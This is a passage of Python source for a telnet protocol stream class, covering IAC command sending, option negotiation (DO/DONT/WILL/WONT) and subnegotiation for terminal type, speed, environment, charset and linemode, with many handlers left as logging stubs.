method:: write(data : bytes, oob=False)\n\n Write data bytes to transport end connected to stream reader.\n Bytes matching IAC (\\xff) are escaped as IAC IAC, unless oob=True.\n \"\"\"\n # All standard telnet bytes, and bytes within an (IAC SB), (IAC SE)\n # sub-negotiation buffer must always be escaped.\n #\n # 8-bit ASCII data values greater than 128 cannot be sent inband\n # unless WILL BINARY ('outbinary') has been agreed, or ``oob``\n # is ``True``.\n #\n # If ``oob`` is set ``True``, data is considered\n # out-of-band and may set high bit.\n assert isinstance(data, (bytes, bytearray)), repr(data)\n if not oob and not self.local_option.enabled(BINARY):\n for pos, byte in enumerate(data):\n assert byte < 128, (\n 'character value {} at pos {} not valid, send '\n 'IAC WILL BINARY first: {}'.format(byte, pos, data))\n self.transport.write(escape_iac(data))\n\n def send_iac(self, data):\n \"\"\" .. method: send_iac(self, data : bytes)\n\n No transformations of bytes are performed; only complete\n IAC commands are legal.\n \"\"\"\n assert isinstance(data, (bytes, bytearray)), data\n assert data and data.startswith(IAC), data\n self.transport.write(data)\n\n def iac(self, cmd, opt=None):\n \"\"\" .. method: iac(self, cmd : bytes, opt : bytes)\n\n Send Is-A-Command (IAC) 2 or 3-byte command option.\n\n Returns True if the command was actually sent. Not all commands\n are legal in the context of client, server, or negotiation state,\n emitting a relevant debug warning to the log handler.\n \"\"\"\n short_iacs = (DM, )\n assert (cmd in (DO, DONT, WILL, WONT)\n or cmd in short_iacs and opt is None), (\n 'Unknown IAC {}.'.format(_name_command(cmd)))\n if opt == LINEMODE:\n if cmd == DO and not self.is_server:\n raise ValueError('DO LINEMODE may only be sent by server.')\n if cmd == WILL and self.is_server:\n raise ValueError('WILL LINEMODE may only be sent by client.')\n if cmd == DO: # XXX any exclusions ?\n if self.remote_option.enabled(opt):\n self.log.debug('skip {} {}; remote_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n if cmd in (DO, WILL):\n if self.pending_option.enabled(cmd + opt):\n self.log.debug('skip {} {}; pending_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n self.pending_option[cmd + opt] = True\n if cmd == WILL and opt != TM:\n if self.local_option.enabled(opt):\n self.log.debug('skip {} {}; local_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n if cmd == DONT and opt not in (LOGOUT,): # XXX any other exclusions?\n if self.remote_option.enabled(opt):\n # warning: some implementations incorrectly reply (DONT, opt),\n # for an option we already said we WONT. This would cause\n # telnet loops for implementations not doing state tracking!\n self.log.debug('skip {} {}; remote_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n self.remote_option[opt] = False\n elif cmd == WONT:\n self.local_option[opt] = False\n if cmd in short_iacs:\n self.send_iac(IAC + cmd)\n else:\n self.send_iac(IAC + cmd + opt)\n self.log.debug('send IAC {}{}'.format(_name_command(cmd),\n ' {}'.format(_name_command(opt)) if cmd not in short_iacs else ''))\n\n# Public methods for notifying about, soliciting, or advertising state options.\n#\n def send_ga(self):\n \"\"\" .. method:: send_ga() -> bool\n\n Send IAC GA (Go-Ahead) only if IAC DONT SGA was received.\n Clients wishing to receive GA should send (DONT SGA). 
Returns\n True if GA was sent.\n \"\"\"\n # Only a few 1970-era hosts require GA (AMES-67, UCLA-CON). The GA\n # signal is very useful for scripting, such as an 'expect'-like\n # program flow, or for MUDs, indicating that the last-most received\n # line is a prompt. Another example of GA is a nethack server\n # (alt.nethack.org), that indicates to ai bots that it has received\n # all screen updates.\n #\n if not self.local_option.enabled(SGA):\n self.send_iac(IAC + GA)\n return True\n\n\n\n def request_status(self):\n \"\"\" .. method:: request_status() -> bool\n\n Send STATUS, SEND sub-negotiation, rfc859.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n # Does nothing if (WILL, STATUS) has not yet been received,\n # or an existing SB STATUS SEND request is already pending.\n if not self.remote_option.enabled(STATUS):\n return False\n if not self.pending_option.enabled(SB + STATUS):\n self.pending_option[SB + STATUS] = True\n self.send_iac(\n b''.join([IAC, SB, STATUS, SEND, IAC, SE]))\n return True\n\n def request_tspeed(self):\n \"\"\" .. method:: request_tspeed() -> bool\n\n Send TSPEED, SEND sub-negotiation, rfc1079.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n # Does nothing if (WILL, TSPEED) has not yet been received,\n # or an existing SB TSPEED SEND request is already pending.\n if not self.remote_option.enabled(TSPEED):\n return False\n if not self.pending_option.enabled(SB + TSPEED):\n self.pending_option[SB + TSPEED] = True\n response = [IAC, SB, TSPEED, SEND, IAC, SE]\n self.log.debug('send: IAC SB TSPEED SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def request_charset(self, codepages=None, sep=' '):\n \"\"\" .. method:: request_charset(codepages : list, sep : string) -> bool\n\n Request sub-negotiation CHARSET, rfc 2066.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\" # TODO: find client that works!\n # At least some modern MUD clients and popular asian telnet BBS\n # systems use CHARSET, and reply 'UTF-8' (or 'GBK',).\n if not self.remote_option.enabled(CHARSET):\n return False\n (REQUEST, ACCEPTED, REJECTED, TTABLE_IS, TTABLE_REJECTED,\n TTABLE_ACK, TTABLE_NAK) = (bytes([const]) for const in range(1, 8))\n if not self.pending_option.enabled(SB + CHARSET):\n self.pending_option[SB + CHARSET] = True\n response = [IAC, SB, CHARSET, REQUEST]\n response.append(bytes(sep.join(codepages), 'ascii'))\n response.extend([IAC, SE])\n self.log.debug('send: IAC SB CHARSET REQUEST {} IAC SE'.format(\n sep.join(codepages)))\n self.send_iac(b''.join(response))\n return True\n\n\n def request_env(self, env=None):\n \"\"\" .. method:: request_env(env : list) -> bool\n\n Request sub-negotiation NEW_ENVIRON, rfc 1572.\n Returns True if request is valid for telnet state, and was sent.\n\n ``env`` is a list of ascii uppercase keys of values requested. The\n default when unset is the instance attribute ``_default_env_request``.\n \"\"\"\n
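On the wire each of these requests is framed as IAC SB <option> ... IAC SE; the TSPEED query above is exactly six bytes. A sketch spelling out the framing with telnetlib's constants (IS and SEND mirror the definitions at the top of this module):

from telnetlib import IAC, SB, SE, TSPEED, NEW_ENVIRON, theNULL
IS, SEND = bytes([0]), bytes([1])

tspeed_query = IAC + SB + TSPEED + SEND + IAC + SE
assert tspeed_query == b'\xff\xfa\x20\x01\xff\xf0'

# request_env (below) frames variable names the same way, NUL-separated:
env_query = (IAC + SB + NEW_ENVIRON + SEND + IS
             + b'USER' + theNULL + b'TERM' + b'\x03' + IAC + SE)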
 # May only be requested by the server end. Sends IAC SB ``kind``\n # SEND IS sub-negotiation, rfc1086, using list of ascii string\n # values ``self._default_env_request``, which is mostly variables\n # for impl.-specific extensions, such as TERM type, or USER for auth.\n request_ENV = self._default_env_request if env is None else env\n assert self.is_server\n kind = NEW_ENVIRON\n if not self.remote_option.enabled(kind):\n self.log.debug('cannot send SB {} SEND IS '\n 'without receipt of WILL {}'.format(\n _name_command(kind), _name_command(kind)))\n return False\n if self.pending_option.enabled(SB + kind + SEND + IS):\n self.log.debug('cannot send SB {} SEND IS, '\n 'request pending.'.format(_name_command(kind)))\n return False\n self.pending_option[SB + kind + SEND + IS] = True\n response = collections.deque()\n response.extend([IAC, SB, kind, SEND, IS])\n for idx, env in enumerate(request_ENV):\n response.extend([bytes(char, 'ascii') for char in env])\n if idx < len(request_ENV) - 1:\n response.append(theNULL)\n response.extend([b'\\x03', IAC, SE])\n self.log.debug('send: {!r}'.format(b''.join(response)))\n self.send_iac(b''.join(response))\n return True\n\n def request_xdisploc(self):\n \"\"\" .. method:: request_xdisploc() -> bool\n\n Send XDISPLOC, SEND sub-negotiation, rfc1096.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if not self.remote_option.enabled(XDISPLOC):\n return False\n if not self.pending_option.enabled(SB + XDISPLOC):\n self.pending_option[SB + XDISPLOC] = True\n response = [IAC, SB, XDISPLOC, SEND, IAC, SE]\n self.log.debug('send: IAC SB XDISPLOC SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def request_ttype(self):\n \"\"\" .. method:: request_ttype() -> bool\n\n Send TTYPE SEND sub-negotiation, rfc930.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if not self.remote_option.enabled(TTYPE):\n return False\n if not self.pending_option.enabled(SB + TTYPE):\n self.pending_option[SB + TTYPE] = True\n response = [IAC, SB, TTYPE, SEND, IAC, SE]\n self.log.debug('send: IAC SB TTYPE SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def send_eor(self):\n \"\"\" .. method:: send_eor() -> bool\n\n Send IAC EOR_CMD (End-of-Record) only if IAC DO EOR was received.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if self.local_option.enabled(EOR):\n self.send_iac(IAC + EOR_CMD)\n\n def send_lineflow_mode(self):\n \"\"\" .. 
method send_lineflow_mode() -> bool\n\n Send LFLOW mode sub-negotiation, rfc1372.\n \"\"\"\n if not self.remote_option.enabled(LFLOW):\n return\n mode = LFLOW_RESTART_ANY if self.xon_any else LFLOW_RESTART_XON\n desc = 'LFLOW_RESTART_ANY' if self.xon_any else 'LFLOW_RESTART_XON'\n self.send_iac(b''.join([IAC, SB, LFLOW, mode, IAC, SE]))\n self.log.debug('send: IAC SB LFLOW %s IAC SE', desc)\n\n def send_linemode(self, linemode=None):\n \"\"\" Request the client switch to linemode ``linemode``, an\n instance of the Linemode class, or self._linemode by default.\n \"\"\"\n assert self.is_server, (\n 'SB LINEMODE LMODE_MODE cannot be sent by client')\n assert self.remote_option.enabled(LINEMODE), (\n 'SB LINEMODE LMODE_MODE cannot be sent; '\n 'WILL LINEMODE not received.')\n if linemode is not None:\n self.log.debug('Linemode is %s', linemode)\n self._linemode = linemode\n self.send_iac(IAC + SB + LINEMODE\n + LMODE_MODE + self._linemode.mask\n + IAC + SE)\n self.log.debug('sent IAC SB LINEMODE MODE %s IAC SE', self._linemode)\n\n def request_forwardmask(self, fmask=None):\n \"\"\" Request the client forward the control characters indicated\n in the Forwardmask class instance ``fmask``. When fmask is\n None, a forwardmask is generated for the SLC characters registered\n in the SLC tab, ``_slctab``.\n \"\"\"\n assert self.is_server, (\n 'DO FORWARDMASK may only be sent by server end')\n assert self.remote_option.enabled(LINEMODE), (\n 'cannot send DO FORWARDMASK without receipt of WILL LINEMODE.')\n if fmask is None:\n fmask = self._generate_forwardmask()\n assert isinstance(fmask, Forwardmask), fmask\n sb_cmd = LINEMODE + DO + LMODE_FORWARDMASK + escape_iac(fmask.value)\n self.log.debug('send IAC SB LINEMODE DO LMODE_FORWARDMASK::')\n for maskbit_descr in fmask.__repr__():\n self.log.debug(' %s', maskbit_descr)\n self.send_iac(IAC + SB + sb_cmd + IAC + SE)\n self.pending_option[SB + LINEMODE] = True\n\n# Public is-a-command (IAC) callbacks\n#\n def set_iac_callback(self, cmd, func):\n \"\"\" Register callable ``func`` as callback for IAC ``cmd``.\n\n BRK, IP, AO, AYT, EC, EL, EOR_CMD, EOF, SUSP, ABORT, and NOP.\n\n These callbacks receive a single argument, the IAC ``cmd`` which\n triggered it.\n \"\"\"\n assert callable(func), ('Argument func must be callable')\n assert cmd in (BRK, IP, AO, AYT, EC, EL, EOR_CMD, EOF, SUSP,\n ABORT, NOP, DM, GA), cmd\n self._iac_callback[cmd] = func\n\n def handle_nop(self, cmd):\n \"\"\" XXX Handle IAC No-Operation (NOP)\n \"\"\"\n self.log.debug('IAC NOP: Null Operation')\n\n def handle_ga(self, cmd):\n \"\"\" XXX Handle IAC Go-Ahead (GA)\n \"\"\"\n self.log.debug('IAC GA: Go-Ahead')\n\n def handle_dm(self, cmd):\n \"\"\" XXX Handle IAC Data-Mark (DM)\n\n Callback sets ``self._dm_recv`` when IAC + DM is received.\n The TCP transport is not tested for OOB/TCP Urgent, so an old\n teletype half-duplex terminal may inadvertently send unintended\n control sequences up until now,\n\n Oh well. \"\"\"\n self.log.debug('IAC DM: received')\n #: set ``True`` when *IAC DM* has been received. MSG_OOB not\n # implemented, so this mechanism _should not be implemented_.\n self._dm_recv = True\n #self.iac(DM)\n\n# Public mixed-mode SLC and IAC callbacks\n#\n def handle_el(self, byte):\n \"\"\" XXX Handle IAC Erase Line (EL) or SLC_EL.\n\n Provides a function which discards all the data ready on current\n line of input. 
The prompt should be re-displayed.\n \"\"\"\n self.log.debug('IAC EL: Erase Line')\n\n def handle_eor(self, byte):\n \"\"\" XXX Handle IAC End of Record (EOR_CMD) or SLC_EOR.\n \"\"\"\n self.log.debug('IAC EOR_CMD: End of Record')\n\n def handle_abort(self, byte):\n \"\"\" XXX Handle IAC Abort (ABORT) rfc1184, or SLC_ABORT.\n\n Similar to Interrupt Process (IP), but means only to abort or\n terminate the process to which the NVT is connected.\n \"\"\"\n self.log.debug('IAC ABORT: Abort')\n\n def handle_eof(self, byte):\n \"\"\" XXX Handle End of File (IAC, EOF), rfc1184 or SLC_EOF.\n \"\"\"\n self.log.debug('IAC EOF: End of File')\n\n def handle_susp(self, byte):\n \"\"\" XXX Handle Suspend Process (SUSP), rfc1184 or SLC_SUSP.\n\n Suspends the execution of the current process attached to the NVT\n in such a way that another process will take over control of the\n NVT, and the suspended process can be resumed at a later time.\n \"\"\"\n # If the receiving system does not support this functionality, it\n # should be ignored.\n self.log.debug('IAC SUSP: Suspend')\n\n def handle_brk(self, byte):\n \"\"\" XXX Handle IAC Break (BRK) or SLC_BRK (Break).\n\n Sent by clients to indicate BREAK keypress. This is not the same\n as IP (^c), but a means to map the system-dependent break key,\n such as that found on IBM systems.\n \"\"\"\n self.log.debug('IAC BRK: Break')\n\n def handle_ayt(self, byte):\n \"\"\" XXX Handle IAC Are You There (AYT) or SLC_AYT.\n\n Provides the user with some visible (e.g., printable) evidence\n that the system is still up and running.\n \"\"\"\n # Terminal servers that respond to AYT usually print the status\n # of the client terminal session, its speed, type, and options.\n self.log.debug('IAC AYT: Are You There?')\n\n def handle_ip(self, byte):\n \"\"\" XXX Handle IAC Interrupt Process (IP) or SLC_IP\n \"\"\"\n self.log.debug('IAC IP: Interrupt Process')\n\n def handle_ao(self, byte):\n \"\"\" XXX Handle IAC Abort Output (AO) or SLC_AO.\n\n Discards any remaining output on the transport buffer.\n \"\"\"\n # \"If the AO were received [...] a reasonable implementation would\n # be to suppress the remainder of the text string, *but transmit the\n # prompt character and the preceding <CR><LF>*.\"\n # XXX TODO: Must netsend()\n self.log.debug('IAC AO: Abort Output')\n pass\n #self.stream.discard_output()\n\n def handle_xon(self, byte):\n \"\"\" XXX handle Transmit-On (IAC, XON) or SLC_XON.\n\n Resumes writing to the transport.\n \"\"\"\n self.log.debug('IAC XON: Transmit On')\n self._xmit = True\n self.transport.resume_writing()\n\n def handle_ec(self, byte):\n \"\"\" XXX Handle IAC + SLC or SLC_EC (Erase Character).\n\n Provides a function which deletes the last preceding undeleted\n character from data ready on current line of input.\n \"\"\"\n self.log.debug('IAC EC: Erase Character')\n\n# public Special Line Mode (SLC) callbacks\n#\n def set_slc_callback(self, slc, func):\n \"\"\" Register ``func`` as callable for receipt of the SLC character\n negotiated for the SLC command ``slc`` in ``_slc_callback``,\n keyed by ``slc`` and valued by its handling function.\n\n SLC_SYNCH, SLC_BRK, SLC_IP, SLC_AO, SLC_AYT, SLC_EOR, SLC_ABORT,\n SLC_EOF, SLC_SUSP, SLC_EC, SLC_EL, SLC_EW, SLC_RP, SLC_XON,\n SLC_XOFF, (...)\n\n These callbacks receive a single argument: the SLC function\n byte that fired it. 
Some SLC and IAC functions are intermixed;\n which signalling mechanism used by client can be tested by\n evaluating this argument.\n \"\"\"\n assert callable(func), ('Argument func must be callable')\n assert (type(slc) == bytes and\n 0 < ord(slc) < NSLC + 1), ('Unknown SLC byte: %r' % (slc,))\n self._slc_callback[slc] = func\n\n def handle_ew(self, slc):\n \"\"\" XXX Handle SLC_EW (Erase Word).\n\n Provides a function which deletes the last preceding undeleted\n character, and any subsequent bytes until next whitespace character\n from data ready on current line of input.\n \"\"\"\n self.log.debug('SLC EW: Erase Word')\n\n def handle_rp(self, slc):\n \"\"\" Handle SLC Repaint.\n \"\"\" # XXX\n self.log.debug('SLC RP: Repaint')\n\n def handle_lnext(self, slc):\n \"\"\" Handle SLC LINE NEXT?\n \"\"\" # XXX\n self.log.debug('IAC LNEXT: Line Next')\n\n def handle_xoff(self, slc):\n \"\"\" Called when SLC_XOFF is received.\n \"\"\"\n self.log.debug('IAC XOFF: Transmit Off')\n self._xmit = False\n self.transport.pause_writing()\n\n# public Telnet extension callbacks\n#\n def set_ext_callback(self, cmd, func):\n \"\"\" Register ``func`` as callback for subnegotiation result of ``cmd``.\n\n cmd must be one of: TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON, or NAWS.\n\n These callbacks may receive a number of arguments.\n\n Callbacks for ``TTYPE`` and ``XDISPLOC`` receive a single argument\n as a bytestring. ``NEW_ENVIRON`` receives a single argument as\n dictionary. ``NAWS`` receives two integer arguments (width, height),\n and ``TSPEED`` receives two integer arguments (rx, tx).\n \"\"\"\n assert cmd in (TTYPE, TSPEED, XDISPLOC,\n NEW_ENVIRON, NAWS, LOGOUT, CHARSET, SNDLOC), cmd\n assert callable(func), ('Argument func must be callable')\n self._ext_callback[cmd] = func\n\n def handle_xdisploc(self, xdisploc):\n \"\"\" XXX Receive XDISPLAY value ``xdisploc``, rfc1096.\n\n xdisploc string format is '<host>:<dispnum>[.<screennum>]'.\n \"\"\"\n self.log.debug('X Display is {}'.format(xdisploc))\n\n def handle_sndloc(self, location):\n \"\"\" XXX Receive LOCATION value ``location``, rfc779.\n \"\"\"\n self.log.debug('Location is {}'.format(location))\n\n def handle_ttype(self, ttype):\n \"\"\" XXX Receive TTYPE value ``ttype``, rfc1091.\n\n Often value of TERM, or analogous to client's emulation capability,\n common values for non-posix client replies are 'VT100', 'VT102',\n 'ANSI', 'ANSI-BBS', or even a mud client identifier. 
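Wiring the two registries together, a server loop can route the SLC interrupt function and the TTYPE subnegotiation result to its own handlers; a sketch continuing the stream object from the earlier snippet (handler bodies are placeholders):

from telnetlib import TTYPE
from slc import SLC_IP

def on_interrupt(slc_byte):
    print('interrupt via', name_slc_command(slc_byte))

def on_ttype(ttype):
    print('client terminal is', ttype)

stream.set_slc_callback(SLC_IP, on_interrupt)  # replaces the handle_ip routing
stream.set_ext_callback(TTYPE, on_ttype)       # fired for IAC SB TTYPE IS ...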
RFC allows\n subsequent requests, the client may solicit multiple times, and\n the client indicates 'end of list' by cycling the return value.\n\n Some example values: VT220, VT100, IBM-3278-(2 through 5),\n ANSITERM, ANSI, TTY, and 5250.\n \"\"\"\n self.log.debug('Terminal type is %r', ttype)\n\n def handle_naws(self, width, height):\n \"\"\" XXX Receive window size ``width`` and ``height``, rfc1073\n \"\"\"\n self.log.debug('Terminal cols=%d, rows=%d', width, height)\n\n def handle_env(self, env):\n \"\"\" XXX Receive environment variables as a dict, rfc1572\n \"\"\"\n self.log.debug('env=%r', env)\n\n def handle_tspeed(self, rx, tx):\n \"\"\" XXX Receive terminal speed from TSPEED as int, rfc1079\n \"\"\"\n self.log.debug('Terminal Speed rx:%d, tx:%d', rx, tx)\n\n\n def handle_location(self, location):\n \"\"\" XXX Handle (IAC, SB, SNDLOC, <location>, IAC, SE), RFC 779.\n \"\"\"\n self.log.debug('Terminal Location:%s', location)\n\n def handle_logout(self, cmd):\n \"\"\" XXX Handle (IAC, (DO | DONT | WILL | WONT), LOGOUT), RFC 727.\n\n Only the server end may receive (DO, DONT).\n Only the client end may receive (WILL, WONT).\n \"\"\"\n # Close the transport on receipt of DO, Reply DONT on receipt\n # of WILL. Nothing is done on receipt of DONT or WONT LOGOUT.\n if cmd == DO:\n self.log.info('client requests DO LOGOUT')\n self.transport.close()\n elif cmd == DONT:\n self.log.info('client requests DONT LOGOUT')\n elif cmd == WILL:\n self.log.debug('recv WILL LOGOUT (timeout warning)')\n self.log.debug('send IAC DONT LOGOUT')\n self.iac(DONT, LOGOUT)\n elif cmd == WONT:\n self.log.info('recv IAC WONT LOGOUT (server refuses logout)')\n\n# public derivable methods DO, DONT, WILL, and WONT negotiation\n#\n def handle_do(self, opt):\n \"\"\" XXX Process byte 3 of series (IAC, DO, opt) received by remote end.\n\n This method can be derived to change or extend protocol capabilities.\n The result of a supported capability is a response of (IAC, WILL, opt)\n and the setting of ``self.local_option[opt]`` to ``True``.\n \"\"\"\n # For unsupported capabilities, RFC specifies a response of\n # (IAC, WONT, opt). Similarly, set ``self.local_option[opt]``\n # to ``False``.\n #\n # This method returns True if the opt enables the willingness of the\n # remote end to accept a telnet capability, such as NAWS. It returns\n # False for unsupported option, or an option invalid in that context,\n # such as LOGOUT.\n self.log.debug('handle_do(%s)' % (_name_command(opt)))\n if opt == ECHO and not self.is_server:\n self.log.warn('cannot recv DO ECHO on client end.')\n elif opt == LINEMODE and self.is_server:\n self.log.warn('cannot recv DO LINEMODE on server end.')\n elif opt == LOGOUT and not self.is_server:\n self.log.warn('cannot recv DO LOGOUT on client end')\n elif opt == TM:\n self.iac(WILL, TM)\n elif opt == LOGOUT:\n self._ext_callback[LOGOUT](DO)\n elif opt in (ECHO, LINEMODE, BINARY, SGA, LFLOW, EXOPL, EOR):\n if not self.local_option.enabled(opt):\n self.iac(WILL, opt)\n return True\n elif opt == STATUS:\n if not self.local_option.enabled(opt):\n self.iac(WILL, STATUS)\n self._send_status()\n return True\n else:\n if self.local_option.get(opt, None) is None:\n self.iac(WONT, opt)\n self.log.warn('Unhandled: DO %s.' 
\n def handle_dont(self, opt):\n \"\"\" Process byte 3 of series (IAC, DONT, opt) received by remote end.\n\n This only results in ``self.local_option[opt]`` set to ``False``, with\n the exception of (IAC, DONT, LOGOUT), which only signals a callback\n to ``handle_logout(DONT)``.\n \"\"\"\n self.log.debug('handle_dont(%s)' % (_name_command(opt)))\n if opt == LOGOUT:\n assert self.is_server, ('cannot recv DONT LOGOUT on client end')\n self._ext_callback[LOGOUT](DONT)\n return\n # Many implementations (wrongly!) send a WONT in reply to DONT. It\n # sounds reasonable, but it can and will cause telnet loops. (ruby?)\n # Correctly, a DONT cannot be declined, so there is no need to\n # affirm in the negative.\n self.local_option[opt] = False\n
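\n # An illustrative trace of the loop warned about above:\n # them: IAC DONT ECHO -> us: IAC WONT ECHO -> them: IAC DONT ECHO ..\n # hence a DONT is acknowledged only by silently updating state.\n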
\"\"\"\n self.log.debug('handle_will(%s)' % (_name_command(opt)))\n if opt in (BINARY, SGA, ECHO, NAWS, LINEMODE, EOR, SNDLOC):\n if opt == ECHO and self.is_server:\n raise ValueError('cannot recv WILL ECHO on server end')\n if opt in (NAWS, LINEMODE, SNDLOC) and not self.is_server:\n raise ValueError('cannot recv WILL %s on client end' % (\n _name_command(opt),))\n if not self.remote_option.enabled(opt):\n self.remote_option[opt] = True\n self.iac(DO, opt)\n if opt in (NAWS, LINEMODE, SNDLOC):\n self.pending_option[SB + opt] = True\n if opt == LINEMODE:\n # server sets the initial mode and sends forwardmask,\n self.send_linemode(self._default_linemode)\n elif opt == TM:\n if opt == TM and not self.pending_option.enabled(DO + TM):\n raise ValueError('cannot recv WILL TM, must first send DO TM.')\n self.log.debug('WILL TIMING-MARK')\n self.pending_option[DO + TM] = False\n elif opt == LOGOUT:\n if opt == LOGOUT and not self.is_server:\n raise ValueError('cannot recv WILL LOGOUT on server end')\n self._ext_callback[LOGOUT](WILL)\n elif opt == STATUS:\n self.remote_option[opt] = True\n self.request_status()\n elif opt == LFLOW:\n if opt == LFLOW and not self.is_server:\n raise ValueError('WILL LFLOW not supported on client end')\n self.remote_option[opt] = True\n self.send_lineflow_mode()\n elif opt == NEW_ENVIRON:\n self.remote_option[opt] = True\n self.request_env()\n elif opt == CHARSET:\n self.remote_option[opt] = True\n self.request_charset()\n elif opt == XDISPLOC:\n if opt == XDISPLOC and not self.is_server:\n raise ValueError('cannot recv WILL XDISPLOC on client end')\n self.remote_option[opt] = True\n self.request_xdisploc()\n elif opt == TTYPE:\n if opt == TTYPE and not self.is_server:\n raise ValueError('cannot recv WILL TTYPE on client end')\n self.remote_option[opt] = True\n self.request_ttype()\n elif opt == TSPEED:\n self.remote_option[opt] = True\n self.request_tspeed()\n else:\n self.remote_option[opt] = False\n self.iac(DONT, opt)\n raise ValueError('Unhandled: WILL %s.' % (_name_command(opt),))\n\n def handle_wont(self, opt):\n \"\"\" Process byte 3 of series (IAC, WONT, opt) received by remote end.\n\n (IAC, WONT, opt) is a negative acknolwedgement of (IAC, DO, opt) sent.\n\n The remote end requests we do not perform a telnet capability.\n\n It is not possible to decline a WONT. ``T.remote_option[opt]`` is set\n False to indicate the remote end's refusal to perform ``opt``.\n \"\"\"\n self.log.debug('handle_wont(%s)' % (_name_command(opt)))\n if opt == TM and not self.pending_option.enabled(DO + TM):\n raise ValueError('WONT TM received but DO TM was not sent')\n elif opt == TM:\n self.log.debug('WONT TIMING-MARK')\n self.pending_option[DO + TM] = False\n elif opt == LOGOUT:\n assert not (self.is_server), (\n 'cannot recv WONT LOGOUT on server end')\n if not self.pending_option(DO + LOGOUT):\n self.log.warn('Server sent WONT LOGOUT unsolicited')\n self._ext_callback[LOGOUT](WONT)\n else:\n self.remote_option[opt] = False\n\n# public derivable Sub-Negotation parsing\n#\n def handle_subnegotiation(self, buf):\n \"\"\" Callback for end of sub-negotiation buffer.\n\n SB options handled here are TTYPE, XDISPLOC, NEW_ENVIRON,\n NAWS, and STATUS, and are delegated to their ``handle_``\n equivalent methods. 
\n# public derivable Sub-Negotiation parsing\n#\n def handle_subnegotiation(self, buf):\n \"\"\" Callback for end of sub-negotiation buffer.\n\n SB options handled here are TTYPE, XDISPLOC, NEW_ENVIRON,\n NAWS, and STATUS, and are delegated to their ``handle_``\n equivalent methods. Implementors of additional SB options\n should extend this method.\n \"\"\"\n # Changes to the default responses should replace the\n # default callbacks ``handle_ttype``, ``handle_xdisploc``,\n # ``handle_env``, and ``handle_naws``, by using\n # ``set_ext_callback(opt_byte, func)``.\n #\n assert buf, ('SE: buffer empty')\n assert buf[0] != theNULL, ('SE: buffer is NUL')\n assert len(buf) > 1, ('SE: buffer too short: %r' % (buf,))\n cmd = buf[0]\n if self.is_server:\n assert cmd in (LINEMODE, LFLOW, NAWS, SNDLOC,\n NEW_ENVIRON, TTYPE, TSPEED, XDISPLOC, STATUS), _name_command(cmd)\n if self.pending_option.enabled(SB + cmd):\n self.pending_option[SB + cmd] = False\n else:\n self.log.debug('[SB + %s] unsolicited', _name_command(cmd))\n if cmd == LINEMODE:\n self._handle_sb_linemode(buf)\n elif cmd == LFLOW:\n self._handle_sb_lflow(buf)\n elif cmd == NAWS:\n self._handle_sb_naws(buf)\n elif cmd == SNDLOC:\n self._handle_sb_sndloc(buf)\n elif cmd == NEW_ENVIRON:\n self._handle_sb_env(buf)\n elif (cmd, buf[1]) == (TTYPE, IS):\n self._handle_sb_ttype(buf)\n elif (cmd, buf[1]) == (TSPEED, IS):\n self._handle_sb_tspeed(buf)\n elif (cmd, buf[1]) == (XDISPLOC, IS):\n self._handle_sb_xdisploc(buf)\n elif (cmd, buf[1]) == (STATUS, SEND):\n self._send_status()\n else:\n raise ValueError('SE: unhandled: %r' % (buf,))\n\n# LINEMODE and SLC-related public methods\n#\n def set_default_linemode(self, lmode=None):\n \"\"\" Set the initial line mode requested by the server if the client\n supports LINEMODE negotiation. The default is::\n\n Linemode(bytes([\n ord(LMODE_MODE_REMOTE) | ord(LMODE_MODE_LIT_ECHO)]))\n\n which indicates remote editing, and that control characters (\\\\b)\n are written to the client terminal without transposing, such that\n \\\\b is written to the client screen, and not '^H'.\n \"\"\"\n assert lmode is None or isinstance(lmode, Linemode), lmode\n if lmode is None:\n self._default_linemode = Linemode(bytes([\n ord(LMODE_MODE_REMOTE) | ord(LMODE_MODE_LIT_ECHO)]))\n else:\n self._default_linemode = lmode\n\n# Private sub-negotiation (SB) routines\n#\n def _handle_sb_tspeed(self, buf):\n assert buf.popleft() == TSPEED\n assert buf.popleft() == IS\n rx, tx = '', ''\n while len(buf):\n value = buf.popleft()\n if value == b',':\n break\n rx += value.decode('ascii')\n while len(buf):\n value = buf.popleft()\n if value == b',':\n break\n tx += value.decode('ascii')\n self.log.debug('sb_tspeed: %s, %s', rx, tx)\n self._ext_callback[TSPEED](int(rx), int(tx))\n\n def _handle_sb_xdisploc(self, buf):\n assert buf.popleft() == XDISPLOC\n assert buf.popleft() == IS\n xdisploc_str = b''.join(buf).decode('ascii')\n self.log.debug('sb_xdisploc: %s', xdisploc_str)\n self._ext_callback[XDISPLOC](xdisploc_str)\n\n def _handle_sb_ttype(self, buf):\n assert buf.popleft() == TTYPE\n assert buf.popleft() == IS\n ttype_str = b''.join(buf).decode('ascii')\n self.log.debug('sb_ttype: %s', ttype_str)\n self._ext_callback[TTYPE](ttype_str)\n
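\n # An illustrative note on rfc1572 framing: a NEW_ENVIRON IS reply\n # introduces names with \\x00 (VAR) or \\x03 (USERVAR) and values\n # with \\x01 (VALUE); e.g. the bytes following (NEW_ENVIRON, IS)\n # for TERM=xterm and LANG=en would be:\n #\n # b'\\x00TERM\\x01xterm\\x00LANG\\x01en'\n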
